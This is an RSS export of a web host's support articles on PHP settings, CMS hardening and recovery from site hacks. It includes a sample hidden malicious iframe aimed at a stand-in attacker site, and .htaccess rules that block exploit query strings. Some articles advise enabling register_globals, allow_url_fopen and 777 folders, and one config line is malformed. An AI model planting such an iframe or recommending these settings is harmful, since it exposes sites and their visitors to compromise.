<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0">
<channel>
<title><![CDATA[FastWebHost]]></title>
<link><![CDATA[https://support.fastwebhost.com/]]></link>
<description />
<generator><![CDATA[Kayako fusion v4.73.3]]></generator>
<item>
<title><![CDATA[Can I have register globals turned on?]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/177]]></link>
<guid isPermaLink="false"><![CDATA[96da2f590cd7246bbde0051047b0d6f7]]></guid>
<pubDate><![CDATA[Wed, 18 Feb 2009 09:36:41 -0800]]></pubDate>
<dc:creator><![CDATA[kumar]]></dc:creator>
<description><![CDATA[Yes, just add the following to the .htaccess file located in the public_html folder: php_flag register_globals on]]></description>
<content:encoded><![CDATA[<p>Yes, just add the following to the .htaccess file located in the public_html folder: <br />php_flag register_globals on</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Troubleshooting an IFrame Injection Attack]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/301]]></link>
<guid isPermaLink="false"><![CDATA[34ed066df378efacc9b924ec161e7639]]></guid>
<pubDate><![CDATA[Sat, 28 Aug 2010 01:10:52 -0700]]></pubDate>
<dc:creator><![CDATA[kumar]]></dc:creator>
<description><![CDATA[IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If your website has recently suffered an iframe attack, do not panic. Here are a few things that you can do immediately after you discovered...]]></description>
<content:encoded><![CDATA[<p>IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If your website has recently suffered an iframe attack, do not panic. Here are a few things that you can do immediately after you discover that your website has been a victim of an iframe injection attack.</p>
<p>&lt;iframe src="<a href="http://www.example-hacker-site.com/inject/?s=some-parameters">http://www.example-hacker-site.com/inject/?s=some-parameters</a>" width="1" height="1" style="visibility: hidden"&gt;&lt;/iframe&gt;<br />An example of a malicious IFRAME injection code</p>
<p>1. Take your website down for a certain period<br />It is recommended to take the website down, as you do not want to be distributing malware or viruses from your website to your visitors. The website should be offline while you are recovering the site.</p>
<p>2. Change all the passwords<br />Although this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website, including FTP passwords, SSH passwords, account passwords, database passwords, admin passwords and so on.</p>
<p>3. Take a copy of the affected website for further analysis<br />You may want to do a further analysis of the attack and might need to refer to the exact injection source code in the future. Take a copy of the affected website in a compressed format (e.g. zip or gzip) and store it in a quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.</p>
<p>4. Replace the entire site with a clean backup copy<br />Do not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night; however, it is more reliable if you have other backup solutions for your website. Scan your backup copy with Anti-Virus software like ZoneAlarm or Trend Micro (use coupon code trendpro to get 10% Off Trend Micro Internet Security Pro 2010) before uploading to the web server to ensure that the backup copy is free from viruses and Trojan horses.</p>
<p>5. Test the website and reopen<br />This is to make sure that the website is reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.</p>
<p>6. Analyse how the attack originated<br />In order to ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it originated. Was it because of a security hole in your application? Was it caused by a weak file permission? Or is your server infected with some virus that injects this code into your website at regular intervals? You will need to understand how it happened in order to prevent it in the future. When necessary, obtain expert advice.</p>
<p>7. Perform appropriate security measures based on the analysis<br />Although you may have recovered your website, it does not mean your website will not be attacked again. If the same security hole still exists, it is very likely that the website will be attacked again in the near future. Therefore, it is recommended that you perform the necessary security measures, be it hardening your web server, upgrading an application, or introducing new security restrictions.</p>
<p>Advice about IFrame attacks:</p>
<p>The common causes seem to be as follows:</p>
<p>* The website is using an old version of an open source application (e.g. WordPress 1.0) which has known security issues<br />* File permissions on the server are not set appropriately (e.g. every file and folder on the server is set to 777 read-write-execute)<br />* Weaknesses in application code, for example insufficient input validation<br />* FTP rather than SFTP is used<br />* There is no IP restriction for SSH and FTP accounts</p>
<p>There are a few simple things that can be done to reduce the risk of your website being attacked.</p>
<p>* Change your passwords periodically (say, at least once a month)<br />* Keep your applications up-to-date. Always upgrade immediately when a new version is available.<br />* Clean up files and directories on the web server. Make sure there are no old files with .bak or .txt extensions lying around<br />* Ensure that appropriate file permissions are used for every file and directory on the web server<br />* Consult with a security expert to obtain the best advice</p>
<p>&nbsp;</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress is giving error: &quot;Missing a temporary folder&quot;  while up...]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/322]]></link>
<guid isPermaLink="false"><![CDATA[5737c6ec2e0716f3d8a7a5c4e0de0d9a]]></guid>
<pubDate><![CDATA[Mon, 01 Aug 2011 15:37:06 -0700]]></pubDate>
<dc:creator><![CDATA[Rupi]]></dc:creator>
<description><![CDATA[WordPress gives the following error on image upload: "image.jpg" has failed to upload due to an error "Missing a temporary folder." If you are receiving this error, please follow the simple instructions below: 1. Create a "tmp" folder in your WordPress root ...]]></description>
<content:encoded><![CDATA[WordPress gives the following error on image upload: "image.jpg" has failed to upload due to an error "Missing a temporary folder."<br /><br />If you are receiving this error, please follow the simple instructions below:<br /><br />1. Create a "tmp" folder in your WordPress root directory with <span style="font-weight: bold;">777 </span>permissions. This can be done with your FTP program.<br /><br />2. Also create a "<span style="font-weight: bold;">php.ini</span>" file in the same location.<br /><br />3. Add the following to the php.ini file:<br /><br /><span style="font-weight: bold;">upload_max_filesize = 16M</span><br style="font-weight: bold;" /><span style="font-weight: bold;">upload_tmp_dir = on</span><br style="font-weight: bold;" /><span style="font-weight: bold;">upload_tmp_dir = /home/username/public_html/wordpressDir/tmp</span><br /><br />Please make sure to replace username with your hosting username, and <span style="font-weight: bold;">wordpressDir</span> with the directory name of your WordPress install. <br />If you have installed WordPress on your homepage then the path will look like: <span style="font-weight: bold;">upload_tmp_dir = /home/username/public_html/tmp<br /><br /></span>4. Copy the same php.ini file to your <span style="font-weight: bold;">wp-admin </span>folder.<br /><br />That's it.<br />]]></content:encoded>
</item>
<item>
<title><![CDATA[How to enable: allow_url_fopen]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/328]]></link>
<guid isPermaLink="false"><![CDATA[cd00692c3bfe59267d5ecfac5310286c]]></guid>
<pubDate><![CDATA[Mon, 11 Jun 2012 17:56:40 -0700]]></pubDate>
<dc:creator />
<description><![CDATA[This can be done via your php.ini file by adding the following line:
allow_url_fopen = On
The php.ini file is where you declare changes to your PHP settings. You can edit the existing php.ini, or create a new text file in any subdirectory and name it ph...]]></description>
<content:encoded><![CDATA[<p>This can be done via your php.ini file by adding the following line:</p>
<div class="look_here"><span style="background-color: #ffff99;">allow_url_fopen = On</span></div>
<p>The php.ini file is where you declare changes to your PHP settings. You can edit the existing php.ini, or create a new text file in any subdirectory and name it php.ini.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Can we install SSL for Addon domains?]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/329]]></link>
<guid isPermaLink="false"><![CDATA[6faa8040da20ef399b63a72d0e4ab575]]></guid>
<pubDate><![CDATA[Wed, 20 Jun 2012 12:17:42 -0700]]></pubDate>
<dc:creator />
<description><![CDATA[Yes, we can install SSL for an Addon domain name.
Every SSL certificate requires a domain name and a dedicated IP address. Shared web hosting accounts can host multiple domains, but all of the domains share the same IP address. We can only assign one IP ...]]></description>
<content:encoded><![CDATA[<p>Yes, we can install SSL for an Addon domain name.</p>
<p>Every SSL certificate requires a domain name and a dedicated IP address. Shared web hosting accounts can host multiple domains, but all of the domains share the same IP address. We can only assign one IP address per account, therefore we can only allow one private SSL certificate per cPanel.</p>
<p>If you need multiple SSL certificates or multiple IP addresses, please purchase a reseller account or multiple shared web hosting accounts.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress Security]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/348]]></link>
<guid isPermaLink="false"><![CDATA[01386bd6d8e091c2ab4c7c7de644d37b]]></guid>
<pubDate><![CDATA[Fri, 22 Feb 2013 13:11:45 -0800]]></pubDate>
<dc:creator />
<description><![CDATA[Wordpress Security
WordPress is used by a lot of users as it is user-friendly for developing sites and is available free of cost. Despite these advantages, it has many loopholes that cannot be ignored. The WordPress team is continuously working and bringi...]]></description>
<content:encoded><![CDATA[<h3><strong>Wordpress Security</strong></h3>
<p>WordPress is used by a lot of users as it is user-friendly for developing sites and is available free of cost. Despite these advantages, it has many loopholes that cannot be ignored. The WordPress team is continuously working and bringing new versions to the market, but the vulnerabilities are still increasing every day on the internet. Some of the security loopholes in WordPress sites are given below:<br /><br />1) Free WordPress themes have security issues<br />2) WordPress&rsquo;s default login is unsafe<br />3) It is vulnerable to URL hacking and other security attacks<br /><br />Steps to decrease vulnerabilities<br />=================================<br />1) Moving the wp-config.php file:<br /><br />wp-config.php is the most important file in WordPress, and you need to protect it from being accessed directly. Instead of keeping it in the public_html folder, you can move it one folder back. Below are the steps.<br /><br />STEP 1: Download your wp-config.php file to your local computer.<br /><br />STEP 2: Now upload this file to the folder just one level above the public_html or www folder. In short, you have to upload it outside the public_html folder (if you have installed WordPress in root).<br /><br />STEP 3: Now open your original wp-config.php (old) file and replace everything inside it with this code.<br /><br />======================<br />&lt;?php<br /> include('/home/username/wp-config.php');<br />?&gt;<br />======================<br /><br />2) Stop directory listing:<br /><br />By default, any readable folder that does not have an index file lists all the files inside it when browsed. To avoid listing your files, you can create index files in all the readable folders. Here is a better, more trusted and less time-consuming solution. 
Just open your .htaccess file and add this code anywhere within it.<br /><br />=====================<br />IndexIgnore *<br />=====================<br /><br />See the URL below for further details on securing a WordPress site<br />============<br /><a href="http://codex.wordpress.org/Hardening_WordPress">http://codex.wordpress.org/Hardening_WordPress</a><br />============</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Secure your joomla site]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/349]]></link>
<guid isPermaLink="false"><![CDATA[0bb4aec1710521c12ee76289d9440817]]></guid>
<pubDate><![CDATA[Sat, 23 Feb 2013 14:28:05 -0800]]></pubDate>
<dc:creator />
<description><![CDATA[Tips to secure your joomla site
Securing your site is rather easy, if you know what, where, and how it needs to be completed. This article may only scratch the surface, but will provide you with enough advice to perform a major upgrade in your site&rsquo;...]]></description>
<content:encoded><![CDATA[<h2 id="post-53">Tips to secure your joomla site</h2>
<p>Securing your site is rather easy, if you know what, where, and how it needs to be completed. This article may only scratch the surface, but will provide you with enough advice to perform a major upgrade in your site&rsquo;s security in a few, easy steps.</p>
<h4><br />1. Change the default database prefix (jos_)</h4>
<p>Most SQL injections that are written to hack a Joomla! website try to retrieve data from the jos_users table. This way, they can retrieve the username and password of the super administrator of the website. Changing the default prefix into something random will prevent (most / all) SQL injections.<br /><br />You can set the database prefix when installing your Joomla! website. If you've already installed Joomla! and want to change your prefix, do the following:<br />&nbsp;&nbsp; * Log on to your Joomla! back-end.<br />&nbsp;&nbsp; * Go to your global configuration and search for the database.<br />&nbsp;&nbsp; * Change your database prefix (Example: fdasqw_) and press Save.<br />&nbsp;&nbsp; * Go to phpMyAdmin to access your database.<br />&nbsp;&nbsp; * Go to export, leave all default values and press Start. Exporting the database can take a while.<br />&nbsp;&nbsp; * When done, select all code and copy it to notepad (or any other text editor).<br />&nbsp;&nbsp; * In phpMyAdmin, select all tables and delete them.<br />&nbsp;&nbsp; * In notepad, do a Search &amp; replace (Ctrl + H). Set the search term to jos_ and change it into your new prefix (Example: fdasqw_). Press "Replace all".<br />&nbsp;&nbsp; * Select everything in your notepad file and copy it. In phpMyAdmin, go to SQL, paste the queries and press Start.<br /><br /><strong>2. Remove version number / name of extensions</strong></p>
<p>Most vulnerabilities only occur in a specific release of a specific extension. Showing MyExtension version 2.14 is a really bad thing. You can modify this message to show only the name of the extension by doing the following:<br /><br />&nbsp;&nbsp;&nbsp; * Retrieve all files of the extension from your server.<br />&nbsp;&nbsp;&nbsp; * Open up Dreamweaver.<br />&nbsp;&nbsp;&nbsp; * Load any file from the extension that you just downloaded to your local machine.<br />&nbsp;&nbsp;&nbsp; * Use the Search function and set the search to Search through specified folder. Navigate to the folder where you downloaded the extension to.<br />&nbsp;&nbsp;&nbsp; * Set the search term to "MyExtension version 2.14" and press OK.<br />&nbsp;&nbsp;&nbsp; * When you have found the correct file, remove the version number.<br />&nbsp;&nbsp;&nbsp; * Upload the changed file to your server and check that the changes have been made.<br /><br /><strong>3. Use a SEF component</strong></p>
<p>Most hackers use the Google inurl: command to search for vulnerable extensions. Use Artio, SH404SEF or another SEF component to rewrite your URLs and prevent hackers from finding them.<br /><br />Additionally, you'll get a higher rank in Google when using search engine friendly URLs.<br /><br /><strong>4. Keep Joomla! and extensions up to date</strong></p>
<p>This one is pretty obvious. Always check for the latest versions of Joomla! and the extensions you're using. Most of the time, vulnerabilities are resolved in later versions.<br /><br /><strong>5. Use the correct CHMOD for each folder and file</strong></p>
<p>Setting files or folders to a CHMOD of 777 or 707 is only necessary when a script needs to write to that file or directory. All other files should have the following configuration:<br /><br />&nbsp;&nbsp;&nbsp; PHP files: 644<br />&nbsp;&nbsp;&nbsp; Other folders: 755<br /><br /><strong>6. Delete leftover files</strong></p>
<p>If you installed an extension that you didn't like, don't just set the extension to unpublished. If you do, the vulnerable files will still be on your website. Use the un-install function to get rid of the extension completely.<br /><br /><strong>7. Change your .htaccess file</strong></p>
<p>Add the following lines to your .htaccess file to block out some common exploits.<br /><br />Open your .htaccess file<br />########## Begin - Rewrite rules to block out some common exploits<br />#<br /># Block out any script trying to set a mosConfig value through the URL<br /><em>RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]</em><br /># Block out any script trying to base64_encode crap to send via URL<br /><em>RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]</em><br /># Block out any script that includes a &lt;script&gt; tag in URL<br /><em>RewriteCond %{QUERY_STRING} (&lt;|%3C).*script.*(&gt;|%3E) [NC,OR]</em><br /># Block out any script trying to set a PHP GLOBALS variable via URL<br /><em>RewriteCond %{QUERY_STRING} GLOBALS(=|\[|%[0-9A-Z]{0,2}) [OR]</em><br /># Block out any script trying to modify a _REQUEST variable via URL<br /><em>RewriteCond %{QUERY_STRING} _REQUEST(=|\[|%[0-9A-Z]{0,2}) [OR]</em><br /># Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)<br /><em>RewriteCond %{QUERY_STRING} CONFIG_EXT(\[|%20|%5B).*= [NC,OR]</em><br /># Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)<br /><em>RewriteCond %{QUERY_STRING} sbp(=|%20|%3D) [OR]</em><br /><em>RewriteCond %{QUERY_STRING} sb_authorname(=|%20|%3D)</em><br /># Send all blocked requests to homepage with 403 Forbidden error!<br /><em>RewriteRule ^(.*)$ index.php [F,L]</em><br />#<br />########## End - Rewrite rules to block out some common exploits<br /><br /><br /></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Reporting Site Attack]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/382]]></link>
<guid isPermaLink="false"><![CDATA[4f6ffe13a5d75b2d6a3923922b3922e5]]></guid>
<pubDate><![CDATA[Wed, 04 Feb 2015 11:03:51 -0800]]></pubDate>
<dc:creator />
<description><![CDATA[This is a concern to many of us Hosters and after some in-depth research, it would seem the most likely cause is that your personal computer is infected. Strange as that may sound, hackers are using a variation of Trojans to infect personal computers and ...]]></description>
<content:encoded><![CDATA[<p>This is a concern to many of us Hosters and after some in-depth research, it would seem the most likely cause is that your personal computer is infected. Strange as that may sound, hackers are using a variation of Trojans to infect personal computers and then use your own FTP login information to change the Index page and/or other targeted pages on your own site. Therefore we request you to scan your computer with a good anti-virus for infected files. Also use Internet protection tools.<br /><br />If you don't have one, you can have your computer checked for viruses for free using HouseCall from TrendMicro (http://housecall.trendmicro.com/). They are a very respected company when dealing with Virus related problems. You can feel secure in using their HouseCall program to access/clean your computer.<br /><br />Once you have done that, please delete the files under public_html and upload them again. <br /><br /><strong>Steps to follow:</strong><br /><br />Step 1: Install a new anti-virus program. Obviously this virus knows how to evade detection by the current anti-virus. It doesn't matter what's being used currently, you have to install something different.<br />Step 2: Log in to your control panel and change your FTP password. Write it down. At this point, DO NOT ACCESS YOUR SITE with FTP until you finish all of these steps.<br />Step 3: Scan and clean every PC that has FTP access to your site. This is also a must. Otherwise you have no idea whose PC it is. Do not give the new FTP passwords to anyone until after you have finished all of these steps.<br />Step 4: Remove the malicious code from your webpages. If you have a known good back-up, use that. If not, download your site (yes, you'll have to type in the new password, but hopefully you've already scanned and cleaned your PC). Then open each file in your HTML editor and find the infectious code. 
This particular malscript usually hides immediately after the opening body tag, but we've also seen it at the end of files. You'll have to check every file on your website, not just index files or just html files. Check every file on your website, even .js and .css files.<br />Step 5: Change your FTP passwords again.<br />Step 6: Please request a delisting through your Google Webmaster account. This is not something that the FastWebHost team can do for you. The excerpt below was copied from Google, and gives you step by step instructions to request a delisting.<br />&nbsp;<br /><strong>http://www.google.com/support/webmasters/bin/answer.py?answer=45432</strong><br />Once you have reviewed your site and are sure it is clean, you can submit a request for review. Note, you will need to verify site ownership before you can request a site review.<br />&nbsp;&nbsp;&nbsp; Sign in to Webmaster Tools with your Google account.<br />&nbsp;&nbsp;&nbsp; On the Dashboard, select the site you want.<br />&nbsp;&nbsp;&nbsp; On the Overview page, click Request a review and follow the instructions.<br />Then you should not have that issue again.<br />This is not the result of a faulty script or weak FTP passwords. It's the result of a virus on a PC with FTP access to the infected website.<br /><br /></p>]]></content:encoded>
</item>
</channel>
</rss>